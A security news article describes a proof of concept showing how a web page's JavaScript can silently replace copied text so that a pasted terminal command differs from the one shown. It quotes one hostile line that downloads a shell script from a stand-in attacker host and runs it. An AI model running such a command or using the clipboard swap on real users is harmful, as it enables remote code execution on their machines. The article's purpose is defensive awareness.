As per the latest warning, programmers, security researchers, sysadmins, and tech hobbyists who copy-paste instructions from websites into a console or terminal risk having their system infected. A techie has shown a simple method that will make you reconsider copying and pasting text from blogs and websites.
Gabriel Friedlander, the founder of security awareness training platform Wizer, has shown an obvious yet surprise hack that will make you think twice about copying-pasting commands from websites. It’s not uncommon for rookie and experienced developers to copy and paste regularly used instructions from a webpage into their programs, a Linux terminal, or a Windows command prompt.
However, Friedlander warns that a webpage might discreetly change the contents of what goes on your clipboard, resulting in a significantly different copy to your clipboard than what you wanted to copy. Worse, if the developer doesn’t conduct the necessary due diligence, they may only learn their misjudgment after pasting the text. It might be too late at that time.
In a basic proof of concept (PoC) posted on his blog, Friedlander invites readers to copy a simple command most sysadmins and developers are acquainted with. Then, he asks to paste everything copied into a text window like Notepad, and something unexpected will be seen:
curl http://attacker-domain:8000/shell.sh | sh
Not only does the clipboard include an entirely distinct command, but it also contains a newline (or return) character at its end. This implies that the preceding example will run as soon as it is copied into a Linux terminal.
Those pasting the text may have mistakenly assumed they were duplicating the simple sudo apt update command, which is used to get updated information about software installed on their machine. That, however, was not the case.
The secret is in the JavaScript code concealed underneath Friedlander’s PoC HTML page. The code snippet executes when you copy the “sudo apt update” content from an HTML element. The copy event is then captured by a JavaScript ‘event listener,’ which replaces the clipboard data with Friedlander’s malicious test code. Note that event listeners in JavaScript have many legal uses, but this is only one example of being abused.
“This is why you should NEVER copy paste commands directly into your terminal,” cautions Friedlander. “You think you are copying one thing, but it’s replaced with something else, like malicious code. All it takes is a single line of code injected into the code you copied to create a backdoor to your app.”
“This attack is very simple but also very harmful.”